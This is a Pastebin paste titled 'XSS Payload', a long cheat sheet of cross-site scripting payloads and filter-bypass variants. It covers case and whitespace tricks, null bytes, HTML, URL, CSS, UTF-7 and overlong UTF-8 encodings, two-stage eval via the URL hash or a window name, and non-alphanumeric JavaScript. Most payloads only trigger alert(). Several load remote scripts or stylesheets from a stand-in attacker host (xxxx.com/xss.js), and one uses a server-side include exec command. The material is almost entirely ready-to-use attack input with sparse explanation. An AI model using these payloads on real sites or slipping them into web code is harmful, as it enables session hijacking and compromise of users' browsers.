SHARE
TWEET

XSS Payload

anhkiet2507 Jun 3rd, 2018 13,902 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  2.  
  3. ><img id=XSS SRC=x onerror=alert(XSS);>
  4.  
  5. ;!--"<XSS>=&{()}"
  6.  
  7. <IMG id=XSS SRC="javascript:alert('XSS');">
  8.  
  9. <IMG id=XSS SRC=javascript:alert('XSS')>
  10.  
  11. <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
  12.  
  13. <IMG id=XSS SRC=javascript:alert("XSS")>
  14.  
  15. <IMG id=XSS SRC=`javascript:alert("'XSS'")`>
  16.  
  17. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  18.  
  19. <IMG id=XSS SRC="jav ascript:alert('XSS');">
  20.  
  21. <IMG id=XSS SRC="jav    ascript:alert('XSS');">
  22.  
  23. <IMG id=XSS SRC="javascript:alert('XSS');">
  24.  
  25. <IMG id=XSS SRC="jav
  26. ascript:alert('XSS');">
  27.  
  28. perl -e 'print "<IMG id=XSS SRC=java\0script:alert(\"XSS\")>";' > out
  29.  
  30. <IMG id=XSS SRC="  javascript:alert('XSS');">
  31.  
  32. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  33.  
  34. <<SCRIPT>alert("XSS");//<</SCRIPT>
  35.  
  36. \";alert('XSS');//
  37.  
  38. <IMG id=XSS SRC='javascript:alert('XSS')
  39.  
  40. <SCRIPT>alert(/XSS/.source)</SCRIPT>
  41.  
  42. <BODY BACKGROUND="javascript:alert('XSS')">
  43.  
  44. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  45.  
  46. <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
  47.  
  48. <BODY ONLOAD=alert('XSS')>
  49.  
  50. <IMG DYN id=XSS SRC="javascript:alert('XSS')">
  51.  
  52. <IMG LOW id=XSS SRC="javascript:alert('XSS')">
  53.  
  54. <BGSOUND id=XSS SRC="javascript:alert('XSS');">
  55.  
  56. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  57.  
  58. <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
  59.  
  60. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  61.  
  62. <TABLE id=XSS BACKGROUND="javascript:alert('XSS')">
  63.  
  64. <TABLE id=XSS><TD BACKGROUND="javascript:alert('XSS')">
  65.  
  66. <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
  67.  
  68. <DIV id=XSS STYLE="width: expression(alert('XSS'));">
  69.  
  70. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  71.  
  72. <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
  73.  
  74. <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
  75.  
  76. <TABLE BACKGROUND="javascript:alert('XSS')">
  77.  
  78. <TABLE><TD BACKGROUND="javascript:alert('XSS')">"
  79.  
  80. <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
  81.  
  82. <DIV id=XSS STYLE="width: expression(alert('XSS'));">
  83.  
  84. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  85.  
  86. <IMG id=XSS STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  87.  
  88. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  89.  
  90. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  91.  
  92. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  93.  
  94. <BASE HREF="javascript:alert('XSS');//">
  95.  
  96. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
  97.  
  98. a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
  99.  
  100. <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
  101.  
  102. <XML ID="XSS"><I><B><IMG id=XSS SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATAid=XSS SRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  103.  
  104. <XML id=XSS SRC="xsstest.xml" ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  105.  
  106. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
  107.  
  108. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  109.  
  110. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  111.  
  112. <SCRIPT id=XSS SRC=http://127.0.0.1></SCRIPT>
  113.  
  114. //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  115.  
  116. <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
  117.  
  118. <IMG id=XSS SRC="&14;javascript:alert('XSS');">
  119.  
  120. <SCRIPT <B>=alert('XSS');"></SCRIPT>
  121.  
  122. <IFRAME id=XSS SRC="javascript:alert('XSS'); <
  123.  
  124. <SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
  125.  
  126. <STYLE>li {list-style-image: url("javascript:alert('XSS');</STYLE><UL><LI>XSS
  127.  
  128. <DIV STYLE="background-image: url(javascript:alert('XSS'));">
  129.  
  130. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  131.  
  132. <a href="javascript#alert('XSS');">
  133.  
  134. <div onmouseover="alert('XSS');">,
  135.  
  136. <input type="image" dynid=XSS SRC="javascript:alert('XSS');">
  137.  
  138. &<script>alert('XSS');</script>">
  139.  
  140. <IMG id=XSS SRC=&{alert('XSS');};>
  141.  
  142. <a id=XSS href="about:<script>alert('XSS');</script>">
  143.  
  144. <DIV id=XSS STYLE="binding: url(javascript:alert('XSS'));">
  145.  
  146. <OBJECT classid=clsid:..." codebase="javascript:alert('XSS');">
  147.  
  148. <style><!--</style><script>alert('XSS');//--></script>
  149.  
  150. ![CDATA[<!--]]<script>alert('XSS');//--></script>
  151.  
  152. <!-- -- --><script>alert('XSS');</script><!-- -- -->
  153.  
  154. <img id=XSS SRC="blah"onmouseover="alert('XSS');">
  155.  
  156. <img id=XSS SRC="blah>"onmouseover="alert('XSS');">
  157.  
  158. <xml id="X"><a><b><script>alert('XSS');</script>;<b></a></xml>
  159.  
  160. <div datafld="b" dataformatas="html" dataid=XSS SRC="#XSS"></div>
  161.  
  162. [\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
  163.  
  164. <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas]]<![CDATA[cript:alert('XSS');">]]</C><X></xml>
  165.  
  166. <form id="test" /><button form="test" formaction="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">X
  167.  
  168. <input id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
  169.  
  170. <select id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
  171.  
  172. <textarea id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
  173.  
  174. <keygen id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
  175.  
  176. <input id=XSS onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
  177.  
  178. <video id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//
  179.  
  180. <body id=XSS onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  181.  
  182. <video><source onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">
  183.  
  184. <video onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source>
  185.  
  186. <iframe id=XSS / /onload=alert(/XSS/)></iframe>
  187. <iframe id=XSS / "onload=alert(/XSS/)></iframe>
  188. <iframe id=XSS///////onload=alert(/XSS/)></iframe>
  189. <iframe id=XSS "onload=alert(/XSS/)></iframe>
  190. <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
  191. <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
  192.  
  193. " onfocus=alert(XSS) "> <"
  194. " onblur=alert(XSS) "> <"
  195. " onmouseover=alert(XSS) ">
  196. " onclick=alert(XSS) ">
  197.  
  198. <FRAMESET><FRAME id=XSS SRC=\"javascript:alert('XSS');\"></FRAMESET>
  199.  
  200. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  201. </textarea>'"><script>alert(XSS)</script>
  202.  
  203. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  204.  
  205. </script></script><<<<script><>>>><<<script>alert(XSS)</script>
  206.  
  207. <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
  208.  
  209. <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
  210.  
  211. '></select><script>alert(XSS)</script>
  212.  
  213. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  214.  
  215. <SCRIPT>document.write("XSS");</SCRIPT>
  216.  
  217. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  218.  
  219. ='><script>alert("xss")</script>
  220.  
  221. <body background=javascript:'"><script>alert(XSS)</script>></body>
  222.  
  223. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  224.  
  225. <SCRIPT>alert('XSS');</SCRIPT>
  226. '';!--"<XSS>=&{()}
  227. <SCRIPT id=XSS SRC=http://xxxx.com/xss.js></SCRIPT>
  228. <IMG id=XSS SRC="javascript:alert('XSS');">
  229. <IMG id=XSS SRC=javascript:alert('XSS')>
  230. <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
  231. <IMG id=XSS SRC=javascript:alert("XSS")>
  232. <IMG id=XSS SRC=`javascript:alert("RSnake says, 'XSS'")`>
  233. <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
  234. id=XSS SRC=<IMG 6;avascript:alert('XSS')>
  235. <IMG id=XSS SRC=javascript:alert('XSS')>
  236. <IMG id=XSS SRC=javascript:alert('XSS')>
  237. <IMG id=XSS SRC="jav ascript:alert('XSS');">
  238. <IMG id=XSS SRC="jav    ascript:alert('XSS');">
  239. <IMG id=XSS SRC="javascript:alert('XSS');">
  240. <IMG id=XSS SRC="jav
  241. ascript:alert('XSS');">
  242. <IMG id=XSS SRC="  javascript:alert('XSS');">
  243. <SCRIPT/XSS id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT>
  244. <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?<B>
  245. <IMG id=XSS SRC="javascript:alert('XSS')"
  246. <SCRIPT>a=/XSS/
  247. \";alert('XSS');//
  248. <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
  249. <BODY BACKGROUND="javascript:alert('XSS')">
  250. <BODY ONLOAD=alert('XSS')>
  251. <IMG DYNid=XSS SRC="javascript:alert('XSS')">
  252. <IMG LOWid=XSS SRC="javascript:alert('XSS')">
  253. <BGSOUND id=XSS SRC="javascript:alert('XSS');">
  254. <BR SIZE="&{alert('XSS')}">
  255. <LAYER id=XSS SRC="http://xxxx.com/scriptlet.html"></LAYER>
  256. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  257. <LINK REL="stylesheet" HREF="http://xxxx.com/xss.css">
  258. <STYLE>@import'http://xxxx.com/xss.css';</STYLE>
  259. <META HTTP-EQUIV="Link" Content="<http://xxxx.com/xss.css>; REL=stylesheet">
  260. <STYLE>BODY{-moz-binding:url("http://xxxx.com/xssmoz.xml#xss")}</STYLE>
  261. <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
  262. <IMG id=XSS SRC="mocha:[code]">
  263. <IMG id=XSS SRC="livescript:[code]">
  264. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  265. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  266. <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
  267. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  268. <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
  269. <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
  270. <TABLE BACKGROUND="javascript:alert('XSS')">
  271. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  272. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  273. <DIV STYLE="width: expression(alert('XSS'));">
  274. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  275. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  276. <XSS STYLE="xss:expression(alert('XSS'))">
  277. exp/*<XSS STYLE='no\xss:noxss("*//*");
  278. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  279. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  280. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  281. <BASE HREF="javascript:alert('XSS');//">
  282. <OBJECT TYPE="text/x-scriptlet" DATA="http://xxxx.com/scriptlet.html"></OBJECT>
  283. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
  284. getURL("javascript:alert('XSS')")
  285. a="get";
  286. <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas<![CDATA[cript:alert('XSS');">
  287. <XML id=XSS SRC="http://xxxx.com/xsstest.xml" ID=I></XML>
  288. <HTML><BODY>
  289. <SCRIPT id=XSS SRC="http://xxxx.com/xss.jpg"></SCRIPT>
  290. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xxxx.com/xss.js></SCRIPT>'"-->
  291. <? echo('<SCR)';
  292. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  293. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  294. <SCRIPT a=">" id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT>
  295. <SCRIPT a=">" '' id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT>
  296. <SCRIPT "a='>'" id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT>
  297. <SCRIPT a=`>` id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT>
  298. <SCRIPT>document.write("<SCRI");</SCRIPT>PT id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT>
  299.  
  300.  
  301. <sCrIpt>alert(1)</ScRipt>
  302. <iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
  303.  
  304. Null-byte character between HTML attribute name and equal sign (IE, Safari).
  305. <img src='1' onerror\x00=alert(0) />
  306.  
  307. Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
  308. <img src='1' onerror/=alert(0) />
  309.  
  310. Vertical tab between HTML attribute name and equal sign (IE, Safari).
  311. <img src='1' onerror\x0b=alert(0) />
  312.  
  313. Null-byte character between equal sign and JavaScript code (IE).
  314. <img src='1' onerror=\x00alert(0) />
  315.  
  316. Null-byte character between characters of HTML attribute names (IE).
  317. <img src='1' o\x00nerr\x00or=alert(0) />
  318.  
  319. Null-byte character before characters of HTML element names (IE).
  320. <\x00img src='1' onerror=alert(0) />
  321.  
  322. Null-byte character after characters of HTML element names (IE, Safari).
  323. <script\x00>alert(1)</script>
  324.  
  325. Null-byte character between characters of HTML element names (IE).
  326. <i\x00mg src='1' onerror=alert(0) />
  327.  
  328. Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
  329. <img/src='1'/onerror=alert(0)>
  330.  
  331. Use vertical tabs instead of whitespace (IE, Safari).
  332. <img\x0bsrc='1'\x0bonerror=alert(0)>
  333.  
  334. Use quotes instead of whitespace in some situations (Safari).
  335. <img src='1''onerror='alert(0)'>
  336. <img src='1'"onerror="alert(0)">
  337.  
  338. Use null-bytes instead of whitespaces in some situations (IE).
  339. <img src='1'\x00onerror=alert(0)>
  340.  
  341. Just don't use spaces (IE, Firefox, Chrome, Safari).
  342. <img src='1'onerror=alert(0)>
  343.  
  344. Prefix URI schemes.
  345. Firefox (\x09, \x0a, \x0d, \x20)
  346. Chrome (Any character \x01 to \x20)
  347. <iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
  348.  
  349. No greater-than characters needed (IE, Firefox, Chrome, Safari).
  350. <img src='1' onerror='alert(0)' <
  351.  
  352. Extra less-than characters (IE, Firefox, Chrome, Safari).
  353. <<script>alert(0)</script>
  354.  
  355. Backslash character between expression and opening parenthesis (IE).
  356. <style>body{background-color:expression\(alert(1))}</style>
  357.  
  358. JavaScript Escaping
  359. <script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
  360.  
  361. Encoding Galore.
  362.  
  363. HTML Attribute Encoding
  364. <img src="1" onerror="alert(1)" />
  365. <img src="1" onerror="alert(1)" />
  366. <iframe src="javascript:alert(1)"></iframe>
  367. <iframe src="javascript:alert(1)"></iframe>
  368.  
  369. URL Encoding
  370. <iframe src="javascript:alert(1)"></iframe>
  371. <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
  372.  
  373. CSS Hexadecimal Encoding (IE specific examples)
  374. <div style="x:expression(alert(1))">Joker</div>
  375. <div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
  376. <div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
  377. <div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
  378.  
  379. JavaScript (hexadecimal, octal, and unicode)
  380. <script>document.write('<img src=1 onerror=alert(1)>');</script>
  381. <script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
  382. <script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
  383. <script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
  384.  
  385. JavaScript (Decimal char codes)
  386. <script>document.write('<img src=1 onerror=alert(1)>');</script>
  387. <script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
  388.  
  389. JavaScript (Unicode function and variable names)
  390. <script>alert(123)</script>
  391. <script>\u0061\u006C\u0065\u0072\u0074(123)</script>
  392.  
  393. Overlong UTF-8 (SiteMinder is awesome!)
  394. < = %C0%BC = %E0%80%BC = %F0%80%80%BC
  395. > = %C0%BE = %E0%80%BE = %F0%80%80%BE
  396. ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
  397. " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
  398.  
  399. <img src="1" onnerror="alert(1)">
  400. %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
  401.  
  402. UTF-7 (Missing charset?)
  403. <img src="1" onerror="alert(1)" />
  404. +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
  405.  
  406. Unicode .NET Ugliness
  407. <script>alert(1)</script>
  408. %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
  409.  
  410. Classic ASP performs some unicode homoglyphic translations... don't ask why...
  411. <img src="1" onerror="alert('1')">
  412. %u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
  413.  
  414. Useless and/or Useful features.
  415.  
  416. HTML 5 (Not comphrensive)
  417. <video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
  418. <video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
  419.  
  420. Usuage of non-existent elements (IE)
  421. <blah style="blah:expression(alert(1))" />
  422.  
  423. CSS Comments (IE)
  424. <div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
  425.  
  426. Alternate ways of executing JavaScript functions
  427. <script>window['alert'](0)</script>
  428. <script>parent['alert'](1)</script>
  429. <script>self['alert'](2)</script>
  430. <script>top['alert'](3)</script>
  431.  
  432. Split up JavaScript into HTML attributes
  433. <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
  434.  
  435. HTML is parsed before JavaScript
  436. <script>
  437. var junk = '</script><script>alert(1)</script>';
  438. </script>
  439.  
  440. HTML is parsed before CSS
  441. <style>
  442. body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
  443. </style>
  444.  
  445. XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
  446. <?xml version="1.0" ?>
  447. <someElement>
  448.    <a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
  449. </someElement>
  450.  
  451. URI Schemes
  452. <iframe src="javascript:alert(1)"></iframe>
  453. <iframe src="vbscript:msgbox(1)"></iframe> (IE)
  454. <iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
  455. <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
  456.  
  457. HTTP Parameter Pollution
  458. http://target.com/something.xxx?a=val1&a=val2
  459. ASP.NET     a = val1,val2
  460. ASP         a = val1,val2
  461. JSP         a = val1
  462. PHP         a = val2
  463.  
  464. Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
  465. <script>eval(location.hash.slice(1))</script>
  466. <script>eval(location.hash)</script> (Firefox)
  467.  
  468. http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
  469.  
  470. Two Stage XSS via name attribute
  471. <iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
  472.  
  473. Non-alphanumeric crazyness...
  474. <script>
  475. $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
  476. </script>
  477.  
  478. <script>
  479. (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]